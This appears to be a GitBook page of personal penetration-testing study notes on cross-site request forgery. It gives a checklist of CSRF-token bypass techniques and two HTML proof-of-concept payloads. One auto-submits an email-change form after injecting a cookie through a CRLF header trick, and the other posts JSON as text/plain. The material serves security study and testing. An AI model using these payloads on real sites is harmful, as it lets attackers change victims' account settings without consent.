0Sec
0Sec
0Sec
  • Spider Security
  • offensive security
    • OSCP
      • WriteUps
        • PortSwigger
          • SQL injection labs
          • Exploiting XXE to retrieve data by repurposing a local DTD
        • PentesterLabs
          • Recon
        • HTB
          • BoardLight
          • Lame
        • THM
          • Walkthroughs
            • Attacktive Directory
            • LineKernel
            • Day 1 — Linux PrivEsc
          • CTF
            • Page
            • BLUE
            • mKingdom
            • RazorBlack
      • Module 1 (General Info)
      • Module 2 (Getting Kali)
        • Leason 1 - Booting Up Kali Linux
        • Leason 2 - The Kali Menu
        • Leason 4 - Finding Your Way Around Kali
        • Leason 5 - Managing Kali Linux Services
      • Module 3 (CLI)
        • The Bash Environment
        • Piping and Redirection
        • Text Searching and Manipulation
          • Regular
        • Managing Processes
        • File and Command Monitoring
      • Module 4 (Practical Tools)
        • Netcat
        • Socat
        • PowerShell & Powercat
        • Wireshark
        • Tcpdump
      • Module 5 (Bash Script)
      • Module 6 (Passive Info Gathering)
      • Module 7 ( Active Info Gathering)
      • Module 8 (Vulnerability Scanning)
      • Module 9 (Web Application Attacks)
        • Cross Site Scripting (XSS)
        • local file inclusion & remote file inclusion
          • Exploit LFI
        • SQL injection
          • Blind Boolean based SQL & Evasion Techniques
          • SQL
          • Login bypass List
        • File upload
        • Remote code execution
      • Module 10 ( Intro Buffer OverFlow)
      • Module 11 (Widows Buffer OverFlow)
        • Buffer OverFlow Challange
      • Module 12 (Linux Buffer OverFlows)
      • Module 13 (Clint Side Attacks)
      • Module 14 (Locating Public Exploits)
      • Module 15 (FIxing Exploits)
      • Module 16 (File Transfers)
      • Module 17 (Antivirus Evasion)
        • Windows
      • Module 18 (Privllege Escalation)
        • Windows
          • Checklist
          • THM - Windows PrivEsc Arena
        • Linux
          • Checklist
          • Linux PrivEsc Arena
      • Module 19 (Password Attacks)
      • Module 20 (Port Redirection and Tunneling)
      • Module 21 (Active Directory Attacks)
        • adbasics_v1.2
      • Module 22 (Metasploit Framwork)
      • Module 23 (Powershell Empire)
      • Course Materials
  • SANS
  • AppSec
    • EWAPTX
      • PHP Type Juggling
      • CSP
      • SqlI
        • Information_schema
        • WriteUps
      • SSTI & CSTI
      • XSS_HTML Injection
      • CORS Attack
      • Clickjacking
      • Open redirect
      • JSONP
      • LFI && LFD && RFI
      • HTTP Host header attacks
      • CSRF
      • XML injection
      • XML external entity (XXE) injection
      • APIs & JWT attacks
      • Insecure Deserialization
      • OAUTH 2.0 authentication vulnerabilities
      • Host Header Injection
      • Insecure Direct Object References (IDOR)
  • Reverse Eng & Malware dev
    • Internals
      • Windows internals
        • Topics in GitHub
        • Chapter 1 Concepts and tools
        • Chapter 2. System architecture
        • Chapter 3. Processes and jobs
        • Chapter 4. Threads
        • Chapter 5. Memory management
        • Chapter 6. I/O system
        • Chapter 7. Security
      • Linux internals ⇒ Soon
      • MacOs X internals ⇒ Soon
  • cheat sheet
    • Pentest_Notes
    • Linux BOF & Wireless Attacks
    • WriteUps
Powered by GitBook
On this page
  1. AppSec
  2. EWAPTX

CSRF

CSRF Checklist

  • [ ] Remove Anti-CSRF Token

  • [ ] No check for the user's Token

  • [ ] Weak Token

  • [ ] Reusable token

  • [ ] Change request method

  • [ ] Guessable Token

  • [ ] Bypass referer

  • [ ] Modifying Parameter Names => POST To GET

  • [ ] Modifying Parameter Names[https://example.com/my/dear/api/val/num?_method=PUT](<https://example.com/my/dear/api/val/num?_method=PUT>)*X-HTTP-MethodX-HTTP-Method-OverrideX-Method-Override*

  • [ ] Custom header token bypass|

  • [ ] Test the request without the **Customized Token and also header.**Test the request with exact same length but a different token.

  • [ ] CSRF token is verified by a cookie

<html>

<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->

<body>

<script>history.pushState('', '', '/')</script>

<form action="<https://example.com/my-account/change-email>" method="POST">

<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />

<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />

<input type="submit" value="Submit request" />

</form>

<img src="<https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E>" onerror="document.forms[0].submit();"/>

</body>

</html>

<aside> 💡 Note that if the csrf token is related to the session cookie this attack won't work because you will need to set the victim to your session, and therefore you will be attacking yourself.

</aside>

Content-Type changeapplication/x-www-form-urlencodedmultipart/form-datatext/plain

<html>

<body>

<form id="form" method="post" action="<https://phpme.be.ax/>" enctype="text/plain">

<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "<https://webhook/>"}'>
Copy
</form>

<script>

form.submit();

</script>

</body>

</html>
PreviousHTTP Host header attacksNextXML injection

Last updated 9 months ago

Example (from ) of sending JSON data as text/plain:

here